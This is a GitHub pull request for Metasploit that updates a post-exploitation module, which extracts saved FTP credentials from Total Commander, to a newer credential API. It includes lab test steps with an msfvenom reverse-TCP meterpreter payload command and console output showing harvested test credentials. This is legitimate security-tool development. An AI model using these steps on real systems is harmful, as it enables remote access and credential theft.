Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update total_commander to use the new cred API #5449

Merged
merged 3 commits into from Jun 5, 2015
Merged

Update total_commander to use the new cred API #5449

merged 3 commits into from Jun 5, 2015

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Jun 2, 2015

The current total_commander uses report_auth_info, and if people use it, they will see a deprecation warning. It should be using the new cred API instead.

  • Download total commander
  • Install Total Commander on a Windows box (XP is easier)
  • Open Total Commander, go to Net, FTP Client, click on New Connection. Create a new connection with a fake username and password, and then click 'OK'.
  • Start msfconsole
  • Do: workspace -a totalcommander_test
  • Do: use exploit/multi/handler
  • Do: run
  • On a new terminal, create an exe payload: ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/mypayload.exe
  • Drag-and-drop the payload to Windows, double click on it. And you should get a session
  • A the meterpreter prompt, do: run post/windows/gather/credentials/total_commander
  • The post module should be able to find the username, password
  • At the meterpreter prompt, do: background
  • Do: creds
  • You should your user/pass from the cred table like the following:
msf exploit(handler) > creds
Credentials
===========

host          service       public      private     realm  private_type
----          -------       ------      -------     -----  ------------
192.168.1.64  21/tcp (ftp)  myusername  mypassword         Password

@wchen-r7 wchen-r7 added the module label Jun 2, 2015
@wchen-r7 wchen-r7 added the creds label Jun 2, 2015
@wchen-r7 wchen-r7 mentioned this pull request Jun 4, 2015
Closed
@jvazquez-r7 jvazquez-r7 self-assigned this Jun 5, 2015
@jvazquez-r7
Copy link
Contributor 

meterpreter > run post/windows/gather/credentials/total_commander




[*] Checking Default Locations...

[*] C:\WINDOWS\wcx_ftp.ini not found ....
[*] C:\Documents and Settings\Administrator\wcx_ftp.ini not found ....
[*] Found File at C:\Documents and Settings\Administrator\Application Data\GHISLER\wcx_ftp.ini
[*] Processing Saved Session 1
[+] *** Host: 172.16.158.23 Port: 21 User: test  Password: password ***
[*] Total Commander Does not Appear to be Installed Globally
[*] Looking at Key HKU\S-1-5-21-790525478-1715567821-1417001333-500
[*] HKUP: %APPDATA%\GHISLER\wcx_ftp.ini
[*] Already Checked AppData
meterpreter >
meterpreter >
meterpreter >
meterpreter >
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > creds
Credentials
===========

host           service       public         private   realm  private_type
----           -------       ------         -------   -----  ------------
172.16.158.23  21/tcp (ftp)  test           password         Password

@jvazquez-r7 jvazquez-r7 merged commit d4f418f into rapid7:master Jun 5, 2015
jvazquez-r7 added a commit that referenced this pull request Jun 5, 2015
@jvazquez-r7
Land #5449, @wchen-r7 updates total_commander to use the new cred API
57b7d10
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jvazquez-r7 jvazquez-r7

Labels
creds module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @jvazquez-r7 @void-in